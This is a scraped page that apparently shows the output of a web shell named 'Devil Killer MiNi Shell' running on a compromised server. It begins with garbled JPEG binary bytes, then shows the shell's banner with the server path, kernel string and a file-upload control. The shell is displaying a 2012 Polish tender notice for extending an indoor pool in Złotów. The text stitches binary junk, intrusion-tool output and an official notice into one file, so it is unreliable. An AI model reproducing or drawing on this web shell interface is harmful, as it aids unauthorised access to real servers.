JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121001/373462-N-2012.html

<p class="kh_header"><b>Złotów: Rozbudowa krytej pływalni o część rehabilitacyjną w Złotowie</b><br>
<b>Numer ogłoszenia: 373462 - 2012; data zamieszczenia: 01.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Złotów , al. Piasta 1, 77-400 Złotów, woj. wielkopolskie, tel. 67 263 21 49 wew. 31, faks 67 265 00 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zlotow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa krytej pływalni o część rehabilitacyjną w Złotowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu zamówienia:

LOKALIZACJA
Teren objęty opracowaniem położony jest w centralnej części Złotowa, w bezpośrednim sąsiedztwie alei Piasta, na działkach oznaczonych numerami geodezyjnym: 34, 35, 37/5, 341/2, 40/1 (obręb nr 88).
Obsługa komunikacyjna obiektu istniejącego oraz projektowanej rozbudowy zorganizowana jest sięgaczem od ulicy Norwida.

ZAGOSPODAROWANIE ISTNIEJĄCE
Teren projektowanej inwestycji bezpośrednio przylega do istniejącego budynku krytej pływalni LAGUNA. Jest płaski (rzędne terenu od 116.60 do 117,12 m npm) i niezabudowany (brak obiektów kubaturowych).
Elementy istniejącego zagospodarowania terenu to zieleń parterowa (trawniki), pojedyncze drzewa i segmenty ogrodzenia pływalni (siatka rozpięta na słupach z rur stalowych).
Od strony południowej do terenu przylega zespół boisk sportowych, od zachodu graniczy z terenami zabudowanymi budynkami mieszkalnymi i gospodarczymi, od północy między budynkiem pływalni a Aleją Piasta działkę pokrywa zieleń o charakterze parkowym (trawnik, drzewa i krzewy).

Na terenie planowanej inwestycji znajdują się podziemne elementy infrastruktury technicznej, związane z istniejącym budynkiem krytej pływalni. Jedna z sieci - przyłącze ciepłociąg 2 x 80 mm koliduje z projektowaną rozbudową i wymaga częściowego przełożenia (zmiany trasy).

ZAGOSPODAROWANIE PROJEKTOWANE
OBIEKT - ROZBUDOWA
Planuje się rozbudowę istniejącej krytej pływalni o część rehabilitacyjną, obejmującą basen rehabilitacyjny o wymiarach 4,0 x 10,0 m z własnym systemem technologicznym wody basenowej oraz zespół saun (suche i mokra) z niezbędnymi pomieszczeniami technicznymi i gospodarczymi.
Rozbudowę zaprojektowano jako parterową z częściowym podpiwniczeniem, obejmującym podbasenie i pomieszczenie technologiczne basenu. Obiekt stanowić będzie część funkcjonalną istniejącej pływalni. Przewiduje się jego dostępność wyłącznie przez wejście główne pływalni i działający zintegrowany system dostępu.
Wejście w nowoprojektowanej części rehabilitacyjnej służy wyłącznie jako wejście techniczne
(dostawy urządzeń i materiałów eksploatacyjnych) i ewentualne wyjście ewakuacyjne.
Rozbudowę, zarówno pod wzglądem formy jak i elementów wykończenia, zharmonizowano z budynkiem istniejącym, wprowadzając niewielkie zmiany (kolor i zastosowane materiały) w celu odróżnienia części obiektu, powstałych w różnym czasie.
KOMUNIKACJA
Obecny dojazd do budynku krytej pływalni urządzony jest sięgaczem komunikacyjnym od ulicy Norwida do głównego wejścia do obiektu. Dostępność dla ruchu pieszego odbywa się od ulic : Norwida i alei Piasta. Nie przewiduje się w tym zakresie żadnych zmian.
Projektuje się, natomiast :
- poszerzenie istniejącego ciągu komunikacyjnego, biegnącego wzdłuż północno-wschodniej
ściany krytej pływalni.
Łączna szerokość ciągu, po przebudowie, wynosić będzie 300 cm, nawierzchnia z kostki betonowej na podbudowie betonowej.
Ciąg służyć będzie sporadycznie jako dojazd dla samochodów dostawczych dowożących materiały eksploatacyjne (szczeg. środki chemiczne) do basenu istniejącego i nowoprojektowanego.
- wykonanie od strony północno-zachodniej przedłużenia ciągu komunikacyjnego do nowoprojektowanej części i zakończenie go placem manewrowym.
Zarówno przedłużenie ciągu jak i plac wykonane będą z płyt ażurowych na podłożu piaskowo-żwirowym.
PARKINGI
Projektuje się poszerzenie sięgacza komunikacyjnego od strony dojazdu do budynku pływalni w kierunku alei Piasta do łącznej szerokości 600 cm, wzdłuż którego zostanie usytuowanych 10 miejsc postojowych. Dwa miejsca, o wymiarach 360 x 500 cm przeznaczone będą dla osób niepełnosprawnych, pozostałe osiem, o wymiarach 250 x 500 cm dla samochodów osobowych. Nawierzchnia dojazdu i stanowisk z kostki betonowej na podbudowie betonowej.
INFRASTRUKTURA TECHNICZNA
Instalacje :
- kanalizacji sanitarnej
- kanalizacji deszczowej
zostaną przyłączone do sieci miejskiej, zgodnie z wydanymi warunkami.
Pozostałe instalacje obiektu rozbudowywanego,
- wodociągowa
- ciepłownicza
- elektryczna
- teletechniczna
zostaną podłączone do instalacji obiektu istniejącego, jako rozbudowa infrastruktury
- rozprowadzenie pozalicznikowe
WIELKOŚCI CHARAKTERYSTYCZNE
Powierzchnia terenu w granicach opracowania 6 774,00m2
w tym :
powierzchnia projektowanego budynku 297,23m2
powierzchnia projektowanych terenów utwardzonych - drogi, chodniki 284,82m2
powierzchnia projektowanych terenów utwardzonych - parkingi 137,25m2
powierzchnia terenów zieleni 3 632,70m2
powierzchnia istniejących budynków i terenów utwardzonych 2 422,00m2

CHARAKTERYSTYKA OBIEKTU: 
Budynek istniejący
Krytą pływalnię zrealizowano w ostatniej dekadzie, na podstawie projektu indywidualnego, opracowanego w pracowni projektowej INWEST-PRO z Kalisza.
Obiekt parterowy, częściowo podpiwniczony, zrealizowany w technologii tradycyjnej:
- fundamenty żelbetowe, wylewane, ściany podziemia murowane z bloczków betonowych
- niecka basenowa żelbetowa, wylewana
- strop nad piwnicą żelbetowy wylewany
- ściany nadziemia dwuwarstwowe, murowane z bloczków (pustaków ceramicznych) systemu porotherm, ocieplone styropianem
- wykończenie elewacji - tynk cienkowarstwowy, malowany, w części okładziny z płyt elewacyjnych oraz cegła klinkierowa
- dach płaski, lekki konstrukcja - dźwigary z drewna klejonego pokrycie od góry - papa termozgrzewalna, styropian i blacha trapezowa
- stolarka okienna z PVC

W obiekcie zlokalizowano:
- basen pływacki o wymiarach 12,5 x 25 m,
- basen do nauki pływania ze zjeżdżalnią,
- jacuzzi,
- sauną i siłownię,
- zespół szatniowo-natryskowy, pomieszczenia obsługowe, personelu i zaplecza,
- w piwnicy pomieszczenia techniczne i technologiczne,
Obiekt jest przystosowany dla osób niepełnosprawnych.

Projektowana rozbudowa
Planuje się rozbudowę istniejącej krytej pływalni o część rehabilitacyjną, składającą się z dwóch element basenu rehabilitacyjnego i zespołu saun.
Rozbudowę zaprojektowano jako jednokondygnacyjną z częściowym podpiwniczeniem.
Na parterze zlokalizowane wszystkie pomieszczenia usługowe dla użytkowników z niezbędnymi pomieszczeniami obsługowymi i gospodarczymi a piwnicę przeznaczono wyłącznie dla urządzeń technicznych.
Nowoprojektowany obiekt, całkowicie zintegrowany z istniejącą pływalnią, stanowić będzie część funkcjonalną kompleksu pływalni. Przewiduje się jego dostępność wyłącznie przez wejście główne pływalni i działający zintegrowany system dostępu. Wejście do budynku, zaprojektowane w nowej części rehabilitacyjnej, służy wyłącznie jako dostęp techniczny (dostawy urządzeń i materiałów eksploatacyjnych) i ewentualne wyjście ewakuacyjne.
Rozbudowę, zarówno pod wzglądem formy jak i elementów wykończenia, zharmonizowano z budynkiem istniejącym, wprowadzając niewielkie zmiany (kolor i zastosowane materiały) w celu odróżnienia części obiektu, powstałych w różnym czasie.

BASEN REHABILITACYJNY zlokalizowano w pomieszczeniu, stanowiącym przedłużenie istniejącej hali basenowej, co uzyskano poprzez przekształcenie czterech dotychczasowych okien w otwory łączące dwie części basenu w jedną przestrzeń. Nowy basen o wymiarach 4,0 x 10,0 m i głębokości 1,30 m, posiadający własny system technologicznym wody basenowej, wyposażono w następujące urządzenia :
- prysznic strumieniowy - 2 szt.
- bicze wodne - 3 szt.
- leżanki do masażu perełkowego (ozon) - 2 szt.
- dysze denne gejzery - 2 szt.
- stacja masażu pionowego całego ciała, wolnostojąca - 1 szt.
- schody zejściowe - 1 szt.
- drabinka - 1 szt.
Wszystkie urządzenia technologiczne basenu rehabilitacyjnego zlokalizowano w piwnicy, w przestrzeni obejmującej podbasenie.
Szczegóły dot. wyposażenia, rozwiązań technicznych i technologicznych basenu znajdują się w opracowaniu pt. Technologia - Basen.
ZESPÓŁ SAUN składać się będzie z dwóch wbudowanych, kompletnych kabin saun suchych, 5-6 osobowych (wg odrębnej dostawy i montażu) oraz łaźni parowej, 5-6 osobowej, (wg odrębnej dostawy i montażu, łącznie z kompletnym wyposażeniem technologicznym, obejmującym m ni. System wentylacji).
Ponadto w zespole zaprojektowano :
- wiaderko bosmańskie
- trzy natryski
- basenik schładzający z zimną wodą
- miejsca do wypoczynku wyposażone w leżaki.
Użytkownicy saun korzystają z przebieralni ogólnych, wobec czego, w zespole saun przewidziano miejsca (wieszaki) do powieszenia okryć i ręczników.

INSTALACJE WEWNĘTRZNE I PRZYŁĄCZA
Budynek wyposażony będzie w :
- instalacje i urządzenia ciepłej i zimnej wody: szczegóły w projekcie branżowym
- instalacje i urządzenia kanalizacji sanitarnej: szczegóły w projekcie branżowym
- instalacje i urządzenia kanalizacji deszczowej: szczegóły w projekcie branżowym
- instalacje i urządzenia grzewcze: szczegóły w projekcie branżowym
- instalacje i urządzenia wentylacyjne: szczegóły w projekcie branżowym
- instalacje i urządzenia elektryczne: szczegóły w projekcie branżowym
- instalacje i urządzenia teletechniczne: szczegóły w projekcie branżowym
- instalacje i urządzenia technologiczne basenu: szczegóły w projekcie branżowym
- instalację odgromową: szczegóły w projekcie branżowym

Instalacje kanalizacji sanitarnej i deszczowej zostaną przyłączone do sieci miejskich, zgodnie z wydanymi warunkami.
Pozostałe instalacje - jako rozbudowa infrastruktury istniejącej pływalni LAGUNA, rozprowadzenie pozalicznikowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.21.22.12-5, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w kwocie 50.000,00 zł. (słownie: pięćdziesiąt tysięcy złotych).
2. Wykonawca wnosi wadium w formach przewidzianych art. 45 ust. 6 ustawy, tj.
w pieniądzu, 
w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach ubezpieczeniowych;
gwarancjach bankowych;
w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275  z późn. zm).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego - w SBL Złotów nr 20 8941 0006 0016 4975 2000 0020
4. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6. W przypadku wniesienia wadium w formie gwarancji z jej treści musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych. 
2. Kopię dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty, natomiast oryginał należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - w pokoju nr 29 u Pana Grzegorza Babińskiego.
3. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
4. Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy. 
5. Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
a) odmówi podpisania umowy na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
6. Wadium należy wnieść przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Od Wykonawcy wymagane jest załączenie oświadczenia o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 ustawy i oświadczenia z art.22 ust.1.
Ocena spełnienia warunku dokonana będzie przez zamawiającego na podstawie złożonych przez wykonawców oświadczeń i dokumentów stosując zasadę spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać się wykonaniem w ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zadania polegające na budowie obiektu użyteczności publicznej.
Ocena spełnienia warunku dokonana będzie przez zamawiającego na podstawie złożonych przez wykonawców oświadczeń i dokumentów stosując zasadę spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Dysponował osobami zdolnymi do wykonania zamówienia, w tym, co najmniej 3 pracownikami kadry technicznej posiadającymi doświadczenie zawodowe oraz uprawnienia niezbędne do kierowania robotami budowlanymi i będącymi członkami właściwych izb samorządu zawodowego, w tym: 
a) 1 osobą na stanowisko kierownika budowy, posiadającą wykształcenie wyższe, min. 5 letnie doświadczenie na stanowisku kierownika budowy lub kierownika robót, w tym przy realizacji, co najmniej jednego zadania inwestycyjnego polegającego na budowie obiektu użyteczności publicznej, posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia, wydane na podstawie wcześniejszych przepisów, 
b) 1 osobą na stanowisko kierownika robót specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych posiadającą wykształcenie wyższe, minimum 3 letnie doświadczenie zawodowe w kierowaniu robotami, w tym, co najmniej przy realizacji jednego obiektu użyteczności publicznej, uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności sanitarnej, w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, lub odpowiadające im ważne uprawnienia, wydane na podstawie wcześniejszych przepisów,
c) 1 osobą na stanowisko kierownika robót elektrycznych i AKPiA, posiadającą wykształcenie wyższe, minimum 3 letnie doświadczenie zawodowe w kierowaniu robotami, w tym, co najmniej przy realizacji jednego obiektu użyteczności publicznej oraz uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia, wydane na podstawie wcześniejszych przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia wymaganego przez Zamawiającego warunku, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda załączenia następujących dokumentów:
był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, związanej z przedmiotem zamówienia, na kwotę co najmniej 1 mln. zł.
Ocena spełnienia warunku dokonana będzie przez zamawiającego na podstawie złożonych przez wykonawców oświadczeń i dokumentów stosując zasadę spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

